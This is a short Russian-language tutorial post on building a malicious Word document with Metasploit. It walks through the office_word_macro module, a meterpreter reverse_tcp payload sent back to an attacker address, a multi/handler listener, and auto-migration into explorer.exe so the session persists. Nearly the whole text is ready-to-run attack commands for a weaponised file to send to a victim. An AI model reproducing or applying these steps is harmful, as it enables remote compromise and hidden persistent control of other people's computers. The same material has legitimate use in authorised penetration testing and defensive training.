5. Внедрение макроса в документ MS Office - 1-й способ

5. Внедрение макроса в документ MS Office - 1-й способ

Sam Sepiol


Для начала воспользуемся поиском эксплоита:

search type:exploit macro

Используем эксплоит:

exploit/multi/fileformat/office_word_macro

далее устанавливаем пэйлоад:

set payload windows/meterpreter/reverse_tcp

посмотрим опции:

show options

Параметр CUSTOMTEMPLATE - содержит путь к готовому файлу, в который хотим внедрить код.

Параметр FILENAME - содержит имя выходного файла.

Параметр LHOST - адрес атакующего компьютера.


Установим эти параметры:

set customtemplate /root/Desktop/document.docx
set filename readme.docm
set lhost 192.168.1.12
exploit

Когда сработает эксплоит то он покажет путь в котором сохранился файл содержащий эксплоит.

После нужно запустить и установить слушатель:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.12
exploit

Сам документ можно закрыть, так как сессия метерпреттер не привязывается к документу, а создается другой процесс.

Узнать под каким процессом работает эксплоит на удаленной машине. Но нужен физический доступ что бы посмотреть.

getpid

Для того что бы сохранить сессию можно мигрировать в другой процесс:

Отображаются абсолютно все параметры модулей пэйлоад и эесплоит.

show advanced

нас интересуют параметры:

PrependMigrate

PrependMigrateProc

PrependMigrate - активирует автоматическое мигрирование процесса. Чтобы его включить достаточно включить - true.

PrependMigrateProc - содержит имя процесса в который необходимо инжектировать пэйлоад.

Установим перечисленные параметры:

set prependmigrate true
set prependmigrateproc explorer.exe
run

Снова отправляем файл и заново запускаем слушатель.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.12
exploit


Report Page